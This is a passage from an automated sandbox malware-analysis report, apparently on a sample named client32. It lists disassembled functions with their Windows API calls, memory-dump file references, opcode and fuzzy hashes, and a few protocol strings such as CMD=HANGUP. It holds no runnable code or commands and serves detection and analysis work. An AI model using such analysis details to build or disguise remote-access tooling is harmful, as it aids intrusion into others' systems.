                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        • Opcode ID: 1a36009cd6a275bed6b610d9cdf34ed3fedc7aca4c57d118844a08bc4411b240
                                                                                                                                        • Instruction ID: f1b84168084f45d181dfd3cae024d6b953ecf41be664da92ed4b045c9483eeb7
                                                                                                                                        • Opcode Fuzzy Hash: 1a36009cd6a275bed6b610d9cdf34ed3fedc7aca4c57d118844a08bc4411b240
                                                                                                                                        • Instruction Fuzzy Hash: 2731C7B5A08618ABC714DF5CD8419ABF7F8AF98308F40862DE85AC7740E770EA04CF95
                                                                                                                                        Function 6892F2F0 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6892F34E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6892F363
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        • Opcode ID: 46953a5aee6d795f8d6a954bb6206fd28c45be6c17ed92642d0e69fb77aff478
                                                                                                                                        • Instruction ID: 876ac5d0e19f457168073c287a7f1f1bbd18bb589f7e854666a9b983b7ae2473
                                                                                                                                        • Opcode Fuzzy Hash: 46953a5aee6d795f8d6a954bb6206fd28c45be6c17ed92642d0e69fb77aff478
                                                                                                                                        • Instruction Fuzzy Hash: 9031A2B5908658AFDB20CF98D841B6EB7B8EB59308F404199E91987341EB31E618CB91
                                                                                                                                        Function 110351A0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • std::exception::exception.LIBCMT ref: 11035277
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1103528C
                                                                                                                                        • std::exception::exception.LIBCMT ref: 1103529B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 110352B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 959338265-0
                                                                                                                                        • Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                                        • Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
                                                                                                                                        • Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                                        • Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91
                                                                                                                                        Function 688FCC90 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 688FCCCD
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 688FCCE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        • Opcode ID: 427c7448aa3db39fb9f784564281b19323c16e960dc8669fc7a55bb374806cee
                                                                                                                                        • Instruction ID: 4f77691604bb1e5ae98b9bc23f89811c3fce6bb7750a9fad78cbb809284f2f6f
                                                                                                                                        • Opcode Fuzzy Hash: 427c7448aa3db39fb9f784564281b19323c16e960dc8669fc7a55bb374806cee
                                                                                                                                        • Instruction Fuzzy Hash: A7314B749046189F8728DF59D9418ABB7F8FF98200B508AAED85A97721E730EE00CB91
                                                                                                                                        Function 6892DF86 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6892DFBA
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 6892DFED
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 6892E01E
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 6892E08C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: c5b4ae8bf8561fb33e7e6592538f19b5fe155b170cc6a5debbf5e11fecbfc0f0
                                                                                                                                        • Instruction ID: 1cd44ded93724c1faf7ab25e9b1448254b6025223d4022754a404f0ac7f877ed
                                                                                                                                        • Opcode Fuzzy Hash: c5b4ae8bf8561fb33e7e6592538f19b5fe155b170cc6a5debbf5e11fecbfc0f0
                                                                                                                                        • Instruction Fuzzy Hash: A9310330A28259EFDB10DFA4C8A49BE7BB9BF02328F5045A9E4718B299D731D941CB54
                                                                                                                                        Function 688FD660 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5950: EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,?,?,688FD68F), ref: 688F596C
                                                                                                                                          • Part of subcall function 688F5950: LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,688FD68F), ref: 688F597D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688FD697
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FD6E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: CMD=HANGUP$CONNECTION_ID=%u
                                                                                                                                        • API String ID: 3168844106-3609349715
                                                                                                                                        • Opcode ID: 4a66ebb213a48de3fa9f47469a81d5dbb8b85e004609fa8f23fad6bfd6502435
                                                                                                                                        • Instruction ID: d56aaef8390cfbbf58b1307e9ad20b743185dfef71565a0e7a5093c104f4dafa
                                                                                                                                        • Opcode Fuzzy Hash: 4a66ebb213a48de3fa9f47469a81d5dbb8b85e004609fa8f23fad6bfd6502435
                                                                                                                                        • Instruction Fuzzy Hash: F531A3B5900709AFCB20CFB8C840AAF7BF8EB48354F50892DE559D7601E735E645CBA2
                                                                                                                                        Function 688F5950 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,?,?,688FD68F), ref: 688F596C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,688FD68F), ref: 688F597D
                                                                                                                                        • SetEvent.KERNEL32(00000318,?,?,?,?,?,688FD68F), ref: 688F59B7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,688FD68F), ref: 688F59CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3394196147-0
                                                                                                                                        • Opcode ID: 7c5607182e395ee0753fa87c7b412ff086a898c419b148aef2bc94c9eaed31f8
                                                                                                                                        • Instruction ID: bba707e0ece844df84aa16a911eeae52d139c7cee5c9080a080010a7c8de0cde
                                                                                                                                        • Opcode Fuzzy Hash: 7c5607182e395ee0753fa87c7b412ff086a898c419b148aef2bc94c9eaed31f8
                                                                                                                                        • Instruction Fuzzy Hash: 1E21BC30E086189FCF20DFA8C8047ADBBF0FB89304F4084AAD85AE7640E7319A05CB90
                                                                                                                                        Function 1106F130 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11066020: SetEvent.KERNEL32 ref: 1106603B
                                                                                                                                          • Part of subcall function 11066020: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1106606C
                                                                                                                                          • Part of subcall function 11066020: DispatchMessageA.USER32(?), ref: 11066076
                                                                                                                                          • Part of subcall function 11066020: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11066084
                                                                                                                                          • Part of subcall function 11065F00: _free.LIBCMT ref: 11065F2C
                                                                                                                                        • CloseHandle.KERNEL32(?,A0A8B03E,?,?,?,?,?,1117E678,000000FF), ref: 1106F17E
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,1117E678,000000FF), ref: 1106F18B
                                                                                                                                        • _free.LIBCMT ref: 1106F1C4
                                                                                                                                        • _free.LIBCMT ref: 1106F1D0
                                                                                                                                          • Part of subcall function 1110C580: CloseHandle.KERNEL32(?,023793D8,1110CD40,?,?,?,?,?,?,?,?,1118575B,000000FF), ref: 1110C59D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message_free$CloseHandlePeek$CriticalDeleteDispatchEventSection
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1300075904-0
                                                                                                                                        • Opcode ID: c3fb6593e887c8985be483796a69c3f201445b10b41502d2bee95913a38693a9
                                                                                                                                        • Instruction ID: 2f6897fb5063a67ecc47f62e77f2a5239dc76439103ae6cbeadf061d0267039e
                                                                                                                                        • Opcode Fuzzy Hash: c3fb6593e887c8985be483796a69c3f201445b10b41502d2bee95913a38693a9
                                                                                                                                        • Instruction Fuzzy Hash: 8B1193B6A04716ABD750DFA4CC90B5BF7ADEB84614F104A2DE52697380DB35B900CBA1
                                                                                                                                        Function 00401020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCommandLineA.KERNEL32 ref: 00401024
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00401079
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
                                                                                                                                        • ExitProcess.KERNEL32 ref: 004010A9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4582948100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4582924850.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4582971225.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4582994339.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2164999147-0
                                                                                                                                        • Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
                                                                                                                                        • Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
                                                                                                                                        • Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
                                                                                                                                        • Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D
                                                                                                                                        Function 688F6830 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F68AE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F68C3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        • Opcode ID: 0ee5326ee8113cc13d74f20f94a6b93c4bdbf5560f811d9a6122d5ccb90789ab
                                                                                                                                        • Instruction ID: c369af21718dae804e88199f70b30f21a64b5d2c797ccd0eb46cc06b454203ae
                                                                                                                                        • Opcode Fuzzy Hash: 0ee5326ee8113cc13d74f20f94a6b93c4bdbf5560f811d9a6122d5ccb90789ab
                                                                                                                                        • Instruction Fuzzy Hash: 84014EB7D083153BEB308A649C0096F77A89B551A4F84043CFA4AC7100F735D905C3E2
                                                                                                                                        Function 688F72C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F733E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F7353
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        • Opcode ID: 0df16f0dbda93462fbb554191d13ecd860b23f0c6215308d69554fc7d5684871
                                                                                                                                        • Instruction ID: 4e84941b8744e8e5792404d6941abf355e024f5ebe65d6801070f45efee068fd
                                                                                                                                        • Opcode Fuzzy Hash: 0df16f0dbda93462fbb554191d13ecd860b23f0c6215308d69554fc7d5684871
                                                                                                                                        • Instruction Fuzzy Hash: 060149B7D082553BEF205AB89C00AAF76E89B552E4FC40838F95AC7100FB35D91183E2
                                                                                                                                        Function 688F7360 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F73DE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F73F9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        • Opcode ID: d0614e0a4147b801e75bf7179f18bc20f7948ae710e868a15c51c4f79cd4331a
                                                                                                                                        • Instruction ID: 88429e60d2e14b0e0d9dde77c18a5897bfae259d7ed79d942f8de1a74fa781a2
                                                                                                                                        • Opcode Fuzzy Hash: d0614e0a4147b801e75bf7179f18bc20f7948ae710e868a15c51c4f79cd4331a
                                                                                                                                        • Instruction Fuzzy Hash: 8901F9B7C083553BEB209AB89C01AAF76F89B551A5FC44438FD5EC7100EB35D95583E2
                                                                                                                                        Function 688F6790 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F680E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F6823
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
